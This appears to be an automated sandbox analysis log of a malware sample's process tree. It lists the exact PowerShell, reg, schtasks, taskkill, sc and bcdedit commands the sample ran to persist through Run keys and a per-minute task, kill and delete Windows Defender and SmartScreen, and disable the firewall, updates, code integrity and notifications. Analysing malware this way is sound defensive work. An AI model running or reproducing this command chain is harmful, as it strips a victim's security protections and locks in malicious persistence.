C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe" /rl LIMITED /f2⤵
- Scheduled Task/Job: Scheduled Task
PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5280 -
C:\Windows\system32\taskkill.exetaskkill /f /im SecurityHealthService.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5260 -
C:\Windows\system32\taskkill.exetaskkill /f /im SecurityHealthSystray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\system32\taskkill.exetaskkill /f /im NisSrv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\taskkill.exetaskkill /f /im MsMpEng.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /im Explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\taskkill.exetaskkill /f /im SmartScreen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe2⤵PID:2072
-
C:\Windows\system32\taskkill.exetaskkill /f /im mrt.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /im Explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"2⤵PID:3280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"2⤵PID:5200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"2⤵PID:2160
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"2⤵PID:4200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f3⤵PID:2128
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f2⤵PID:5064
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f3⤵PID:6108
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f2⤵PID:4624
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f2⤵PID:5336
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f3⤵PID:1328
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f3⤵PID:640
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f2⤵PID:1080
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f3⤵PID:1496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f2⤵PID:3108
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f3⤵PID:2312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
- Modifies firewall policy service
PID:688
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f2⤵PID:1096
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f3⤵PID:3868
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal2⤵PID:6048
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} safeboot minimal3⤵
- Modifies boot configuration data using bcdedit
PID:5688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul2⤵PID:5844
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f3⤵
- Modifies registry key
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul2⤵PID:6092
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵
- Modifies registry key
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f3⤵PID:4368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f2⤵PID:4424
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f3⤵PID:4416
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f2⤵PID:5436
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f3⤵PID:4988
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall2⤵PID:1408
-
C:\Windows\system32\taskkill.exetaskkill /f /im OneDrive.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SysWOW64\OneDriveSetup.exeC:\Windows\SysWOW64\OneDriveSetup.exe /uninstall3⤵
- System Location Discovery: System Language Discovery
PID:4592 -
C:\Windows\SysWOW64\OneDriveSetup.exe"C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-814918696-1585701690-3140955116-10004⤵
- System Location Discovery: System Language Discovery
PID:5168
-
-
C:\Windows\SysWOW64\OneDriveSetup.exeC:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV24⤵
- System Location Discovery: System Language Discovery
PID:4672
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f2⤵
- Indicator Removal: Clear Persistence
PID:4788 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f3⤵PID:5904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f2⤵PID:392
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f3⤵PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f3⤵PID:4000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f2⤵PID:5824
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f3⤵PID:4048
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f2⤵PID:1552
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f3⤵PID:4104
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f3⤵PID:5476
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
PID:4316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc delete WinDefend2⤵PID:5864
-
C:\Windows\system32\sc.exesc delete WinDefend3⤵
- Launches sc.exe
PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f2⤵PID:1716
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f3⤵PID:5472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f2⤵PID:5032
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f3⤵PID:4072
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:4160
-
-
